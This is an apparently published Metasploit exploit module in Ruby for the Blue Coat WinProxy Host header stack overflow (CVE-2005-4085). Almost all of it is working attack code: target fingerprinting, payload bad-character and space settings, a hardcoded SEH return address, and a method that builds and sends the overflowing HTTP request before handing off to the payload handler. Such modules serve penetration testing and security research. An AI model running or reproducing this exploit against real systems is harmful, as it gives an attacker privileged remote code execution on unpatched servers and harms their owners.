GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for the Blue Coat WinProxy Host header stack overflow
# (CVE-2005-4085, OSVDB 22238, BID 16147). A single HTTP request whose
# Host header carries an over-long port component overflows a stack buffer
# in the WinProxy service; the SEH mixin supplies the handler overwrite.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  HttpFingerprint = { :method => 'HEAD', :pattern => [ /BlueCoat/ ] }

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  # Byte offset within the request at which the SEH record is spliced in.
  # "GET / HTTP/1.1\r\n" (16 bytes) plus "Host: " (6 bytes) precede the
  # address, so the splice begins inside "127.0.0.1:" and runs on into
  # the random port text and beyond.
  SEH_OFFSET = 23

  # Registers module metadata (name, references, payload constraints,
  # the single universal target) and the RPORT option (default 80).
  def initialize(info = {})
    module_info = {
      'Name' => 'Blue Coat WinProxy Host Header Overflow',
      'Description' => %q{
        This module exploits a buffer overflow in the Blue Coat Systems WinProxy
        service by sending a long port value for the Host header in a HTTP
        request.
      },
      'Author' => 'MC',
      'License' => MSF_LICENSE,
      'References' => [
        ['CVE', '2005-4085'],
        ['OSVDB', '22238'],
        ['BID', '16147'],
        ['URL', 'http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html'],
      ],
      'DefaultOptions' => { 'EXITFUNC' => 'thread' },
      'Payload' => {
        'Space' => 600,
        # Bytes that would terminate or alter the header before it reaches
        # the vulnerable copy (NUL, ':', '&', '?', '%', '#', space, CR/LF, ...).
        'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
        'StackAdjustment' => -3500,
      },
      'Platform' => 'win',
      'Targets' => [
        # Return address lives in Asmdat.dll, hence "Universal" for this version range.
        [ 'WinProxy <= 6.1 R1a Universal', { 'Ret' => 0x6020ba04 } ],
      ],
      'Privileged' => true,
      'DisclosureDate' => '2005-01-05',
      'DefaultTarget' => 0,
    }
    super(update_info(info, module_info))

    register_options([ Opt::RPORT(80) ])
  end

  # Connects to RPORT, sends the malformed request, waits up to 3 seconds
  # for any response, then hands off to the payload handler and disconnects.
  def exploit
    connect

    print_status("Trying target #{target.name}...")

    sock.put(build_request)
    sock.get_once(-1, 3)

    handler
    disconnect
  end

  private

  # Builds the single trigger request. The port component of the Host
  # header is filled with random printable text (avoiding payload badchars),
  # then the SEH record generated for the target's return address is written
  # over the buffer starting at SEH_OFFSET. From a defender's view the
  # distinguishing feature on the wire is a Host header whose port part is
  # far longer than any valid port number.
  #
  # @return [String] the complete request, terminated by a blank line
  def build_request
    request = "GET / HTTP/1.1\r\n".dup
    request << "Host: 127.0.0.1:"
    request << rand_text_english(31, payload_badchars)
    seh = generate_seh_payload(target.ret)
    # Replaces from SEH_OFFSET to the end when seh is longer than the remainder.
    request[SEH_OFFSET, seh.length] = seh
    request << "\r\n\r\n"
  end
end